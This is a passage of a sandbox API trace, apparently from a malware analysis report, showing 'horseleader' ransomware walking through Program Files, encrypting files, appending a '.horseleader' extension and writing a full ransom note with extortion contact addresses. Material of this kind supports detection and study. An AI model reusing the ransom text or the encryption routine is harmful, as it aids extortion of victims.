lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0251.339] CloseHandle (hObject=0x1cc) returned 1 [0251.339] GetProcessHeap () returned 0x780000 [0251.339] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0251.339] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="System", cAlternateFileName="")) returned 0 [0251.339] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0251.339] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\#Decrypt#.txt") returned 47 [0251.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0251.340] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.340] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0251.342] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.342] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0251.342] CloseHandle (hObject=0x164) returned 1 [0251.342] GetProcessHeap () returned 0x780000 [0251.342] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0251.342] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0251.342] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0251.342] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0251.342] StrStrIW (lpFirst="desktop.ini", lpSrch=".horseleader") returned 0x0 [0251.342] lstrcmpW (lpString1="desktop.ini", lpString2="#Decrypt#.txt") returned 1 [0251.342] lstrcmpW (lpString1="desktop.ini", lpString2="_uninstalling_.png") returned 1 [0251.343] lstrlenW (lpString=".testttjffg") returned 11 [0251.343] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\desktop.ini", lpSrch=".testttjffg") returned 0x0 [0251.343] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0251.343] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0251.343] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0251.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0251.343] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0251.343] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=174) returned 1 [0251.343] ReadFile (in: hFile=0x164, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0xae, lpOverlapped=0x0) returned 1 [0251.344] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.344] WriteFile (in: hFile=0x164, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0xae, lpOverlapped=0x0) returned 1 [0251.345] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.345] WriteFile (in: hFile=0x164, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0251.345] WriteFile (in: hFile=0x164, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0251.345] CloseHandle (hObject=0x164) returned 1 [0251.345] GetProcessHeap () returned 0x780000 [0251.345] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0251.345] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\desktop.ini.horseleader") returned 44 [0251.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\desktop.ini.horseleader" (normalized: "c:\\program files\\desktop.ini.horseleader")) returned 1 [0251.346] GetProcessHeap () returned 0x780000 [0251.346] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0251.346] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe37936a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe37936a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0251.346] lstrcmpiW (lpString1="DVD Maker", lpString2="Windows") returned -1 [0251.346] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker") returned 30 [0251.346] lstrcmpW (lpString1="DVD Maker", lpString2=".") returned 1 [0251.346] lstrcmpW (lpString1="DVD Maker", lpString2="..") returned 1 [0251.346] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.346] GetProcessHeap () returned 0x780000 [0251.347] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\*") returned 32 [0251.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe37936a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe37936a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0251.347] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\.") returned 32 [0251.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.347] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe37936a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe37936a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0251.347] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\..") returned 33 [0251.347] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.347] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf555900, ftCreationTime.dwHighDateTime=0x1d5dceb, ftLastAccessTime.dwLowDateTime=0x2051f700, ftLastAccessTime.dwHighDateTime=0x1d5791e, ftLastWriteTime.dwLowDateTime=0x2051f700, ftLastWriteTime.dwHighDateTime=0x1d5791e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0251.347] lstrcmpiW (lpString1="active-charge.exe", lpString2="Windows") returned -1 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\active-charge.exe") returned 48 [0251.348] StrStrIW (lpFirst="active-charge.exe", lpSrch=".horseleader") returned 0x0 [0251.348] lstrcmpW (lpString1="active-charge.exe", lpString2="#Decrypt#.txt") returned 1 [0251.348] lstrcmpW (lpString1="active-charge.exe", lpString2="_uninstalling_.png") returned 1 [0251.348] lstrlenW (lpString=".testttjffg") returned 11 [0251.348] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\active-charge.exe", lpSrch=".testttjffg") returned 0x0 [0251.348] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.348] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\active-charge.exe" (normalized: "c:\\program files\\dvd maker\\active-charge.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.348] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab2e49a0, ftCreationTime.dwHighDateTime=0x1d5a5ec, ftLastAccessTime.dwLowDateTime=0xa7eec750, ftLastAccessTime.dwHighDateTime=0x1d594db, ftLastWriteTime.dwLowDateTime=0xa7eec750, ftLastWriteTime.dwHighDateTime=0x1d594db, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="afr38.exe", cAlternateFileName="")) returned 1 [0251.348] lstrcmpiW (lpString1="afr38.exe", lpString2="Windows") returned -1 [0251.349] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\afr38.exe") returned 40 [0251.349] StrStrIW (lpFirst="afr38.exe", lpSrch=".horseleader") returned 0x0 [0251.349] lstrcmpW (lpString1="afr38.exe", lpString2="#Decrypt#.txt") returned 1 [0251.349] lstrcmpW (lpString1="afr38.exe", lpString2="_uninstalling_.png") returned 1 [0251.349] lstrlenW (lpString=".testttjffg") returned 11 [0251.349] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\afr38.exe", lpSrch=".testttjffg") returned 0x0 [0251.349] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.349] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\afr38.exe" (normalized: "c:\\program files\\dvd maker\\afr38.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.349] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed7565, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0ed7565, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0efd6c5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="audiodepthconverter.ax", cAlternateFileName="")) returned 1 [0251.349] lstrcmpiW (lpString1="audiodepthconverter.ax", lpString2="Windows") returned -1 [0251.349] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned 53 [0251.349] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".horseleader") returned 0x0 [0251.349] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="#Decrypt#.txt") returned 1 [0251.349] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="_uninstalling_.png") returned 1 [0251.349] lstrlenW (lpString=".testttjffg") returned 11 [0251.349] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax", lpSrch=".testttjffg") returned 0x0 [0251.350] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.350] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.351] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499cc441, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x499cc441, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1303c, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bod_r.TTF", cAlternateFileName="")) returned 1 [0251.351] lstrcmpiW (lpString1="bod_r.TTF", lpString2="Windows") returned -1 [0251.351] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF") returned 40 [0251.351] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".horseleader") returned 0x0 [0251.351] lstrcmpW (lpString1="bod_r.TTF", lpString2="#Decrypt#.txt") returned 1 [0251.351] lstrcmpW (lpString1="bod_r.TTF", lpString2="_uninstalling_.png") returned 1 [0251.351] lstrlenW (lpString=".testttjffg") returned 11 [0251.351] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF", lpSrch=".testttjffg") returned 0x0 [0251.351] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.351] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.352] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0ed7565, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="directshowtap.ax", cAlternateFileName="")) returned 1 [0251.352] lstrcmpiW (lpString1="directshowtap.ax", lpString2="Windows") returned -1 [0251.352] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax") returned 47 [0251.353] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".horseleader") returned 0x0 [0251.353] lstrcmpW (lpString1="directshowtap.ax", lpString2="#Decrypt#.txt") returned 1 [0251.353] lstrcmpW (lpString1="directshowtap.ax", lpString2="_uninstalling_.png") returned 1 [0251.353] lstrlenW (lpString=".testttjffg") returned 11 [0251.353] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax", lpSrch=".testttjffg") returned 0x0 [0251.353] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.353] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.353] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ae6642, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc9ae6642, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xe1601f60, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x227600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="DVDMaker.exe", cAlternateFileName="")) returned 1 [0251.353] lstrcmpiW (lpString1="DVDMaker.exe", lpString2="Windows") returned -1 [0251.353] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe") returned 43 [0251.353] StrStrIW (lpFirst="DVDMaker.exe", lpSrch=".horseleader") returned 0x0 [0251.354] lstrcmpW (lpString1="DVDMaker.exe", lpString2="#Decrypt#.txt") returned 1 [0251.354] lstrcmpW (lpString1="DVDMaker.exe", lpString2="_uninstalling_.png") returned 1 [0251.354] lstrlenW (lpString=".testttjffg") returned 11 [0251.354] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe", lpSrch=".testttjffg") returned 0x0 [0251.354] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.354] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.354] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="en-US", cAlternateFileName="")) returned 1 [0251.354] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0251.354] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US") returned 36 [0251.354] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0251.354] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0251.354] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.354] GetProcessHeap () returned 0x780000 [0251.354] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0251.355] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*") returned 38 [0251.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, 